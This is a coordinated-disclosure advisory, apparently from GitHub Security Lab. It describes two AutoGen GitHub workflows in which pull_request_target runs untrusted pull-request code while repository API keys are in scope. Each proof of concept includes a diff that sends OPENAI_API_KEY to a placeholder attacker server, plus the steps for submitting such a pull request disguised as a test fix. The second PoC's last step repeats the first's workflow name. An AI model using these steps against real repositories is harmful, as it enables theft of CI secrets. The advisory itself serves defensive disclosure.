Coordinated Disclosure Timeline
- 2024-02-27: Reported to MSRC.
- 2024-03-08: Workflows are updated to remove the
pull_request_targettrigger.
Summary
Several GitHub workflow may leak secret API Keys (OpenAI, Azure, Bing, etc.) when triggered by any Pull Request.
Project
AutoGen
Tested Version
Details
Issue 1: Untrusted checkout leading to secrets exfiltration from a Pull Request in contrib-openai.yml (GHSL-2024-025)
The pull_request_target trigger event used in contrib-openai.yml GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.
name: OpenAI4ContribTests
on:
pull_request_target:
branches: ['main']
paths:
- 'autogen/**'
- 'test/agentchat/contrib/**'
- '.github/workflows/contrib-openai.yml'
- 'setup.py'
permissions: {}
...
RetrieveChatTest:
...
steps:
# checkout to pr branch
- name: Checkout
uses: actions/checkout@v3
with:
ref: ${{ github.event.pull_request.head.sha }}
...
- name: Coverage
env:
OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
run: |
coverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py test/agentchat/contrib/test_qdrant_retrievechat.py
coverage xml
By explicitly checking out and running a test script from a fork, the untrusted code is running in an environment that is able to access secrets. See Preventing pwn requests for more information.
An attacker could create a pull request with a malicious test/agentchat/contrib/test_qdrant_retrievechat.py which would get access to the secrets stored in the the environmental variables (eg: OPENAI_API_KEY, AZURE_OPENAI_API_KEY, BING_API_KEY, etc. ).
Note, that in addition to the RetrieveChatTest.Coverage step, there are other steps in the same workflow which are also vulnerable so secret exfiltration:
CompressionTest.CoverageGPTAssistantAgent.CoverageTeachableAgent.CoverageAgentBuilder.CoverageWebSurfer.CoverageContextHandling.Coverage
This vulnerability was found using the Checkout of untrusted code in trusted context CodeQL query.
Proof Of Concept (PoC)
To verify the vulnerability follow the following steps:
- Clone the repo:
gh repo clone microsoft/autogen. - Edit
test/agentchat/contrib/test_retrievechat.pyand apply the following diff (replaceYOUR-CONTROLLED-SERVERwith your own request catcher server): ```diff diff –git a/test/agentchat/contrib/test_retrievechat.py b/test/agentchat/contrib/test_retrievechat.py index eeda1dc48..3c050d92b 100644 — a/test/agentchat/contrib/test_retrievechat.py +++ b/test/agentchat/contrib/test_retrievechat.py @@ -17,6 +17,8 @@ try: from autogen.agentchat.contrib.retrieve_user_proxy_agent import ( RetrieveUserProxyAgent, ) - import urllib.request
- urllib.request.urlopen(f”https://YOUR-CONTROLLED-SERVER?{os.environ[‘OPENAI_API_KEY’]}”) import chromadb from chromadb.utils import embedding_functions as ef except ImportError: ```
- Create a new branch:
git checkout -b add_new_test. - Stage modified file:
git add test/agentchat/contrib/test_retrievechat.py. - Commit change:
git commit -m "fix(tests): Check API key". - Send PR:
gh pr createand follow instructions on screen. - Once the PR is received, the
contrib-openai.ymlworkflow should trigger which should result in the execution ofcoverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py test/agentchat/contrib/test_qdrant_retrievechat.pywhich will execute the payload and will send the OPENAI_API_KEY to the attacker-controlled server.
Impact
Even though the workflow runs with no write permissions and therefore, it does not allow for unauthorized modification of the base repository, it allows an attacker to exfiltrate any secrets available to the script.
Issue 2: Untrusted checkout leading to secrets exfiltration from a Pull Request in openai.yml (GHSL-2024-026)
Similarly, the pull_request_target trigger event used in openai.yml GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.
name: OpenAI
on:
pull_request_target:
branches: ["main"]
paths:
- "autogen/**"
- "test/**"
- "notebook/agentchat_auto_feedback_from_code_execution.ipynb"
- "notebook/agentchat_function_call.ipynb"
- "notebook/agentchat_groupchat_finite_state_machine.ipynb"
- ".github/workflows/openai.yml"
permissions: {}
...
test:
...
steps:
# checkout to pr branch
- name: Checkout
uses: actions/checkout@v3
with:
ref: ${{ github.event.pull_request.head.sha }}
...
- name: Coverage
if: matrix.python-version == '3.9'
env:
OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
run: |
coverage run -a -m pytest test --ignore=test/agentchat/contrib
coverage xml
- name: Coverage and check notebook outputs
if: matrix.python-version != '3.9'
env:
OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
WOLFRAM_ALPHA_APPID: ${{ secrets.WOLFRAM_ALPHA_APPID }}
OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
run: |
pip install nbconvert nbformat ipykernel
coverage run -a -m pytest test/test_notebook.py
coverage xml
cat "$(pwd)/test/executed_openai_notebook_output.txt"
By explicitly checking out and running a test script from a fork, the untrusted code is running in an environment that is able to access secrets. See Preventing pwn requests for more information.
An attacker could create a pull request with a malicious python script in the test/ directory which would get access to the secrets stored in the the environmental variables (eg: OPENAI_API_KEY, AZURE_OPENAI_API_KEY ).
This vulnerability was found using the Checkout of untrusted code in trusted context CodeQL query.
Proof Of Concept (PoC)
To verify the vulnerability follow the following steps:
- Clone the repo:
gh repo clone microsoft/autogen. - Edit
test/test_notebook.pyand apply the following diff (replaceYOUR-CONTROLLED-SERVERwith your own request catcher server): ```diff diff –git a/test/test_notebook.py b/test/test_notebook.py index 2fd6c8a65..6cae44636 100644 — a/test/test_notebook.py +++ b/test/test_notebook.py @@ -1,8 +1,12 @@ import sys import os +import urllib.request^M +^M import pytest from conftest import skip_openai
+urllib.request.urlopen(f”https://YOUR-CONTROLLED-SERVER?{os.environ[‘OPENAI_API_KEY’]}”)^M +^M try: import openai except ImportError: ```
- Create a new branch:
git checkout -b add_new_test. - Stage modified file:
git add test/test_notebook.py. - Commit change:
git commit -m "fix(tests): Check API key". - Send PR:
gh pr createand follow instructions on screen. - Once the PR is received, the
contrib-openai.ymlworkflow should trigger which should result in the execution ofcoverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py test/agentchat/contrib/test_qdrant_retrievechat.pywhich will execute the payload and will send the OPENAI_API_KEY to the attacker-controlled server.
Impact
Even though the workflow runs with no write permissions and therefore, it does not allow for unauthorized modification of the base repository, it allows an attacker to exfiltrate any secrets available to the script.
Credit
These issues were discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-025 or GHSL-2024-026 in any communication regarding these issues.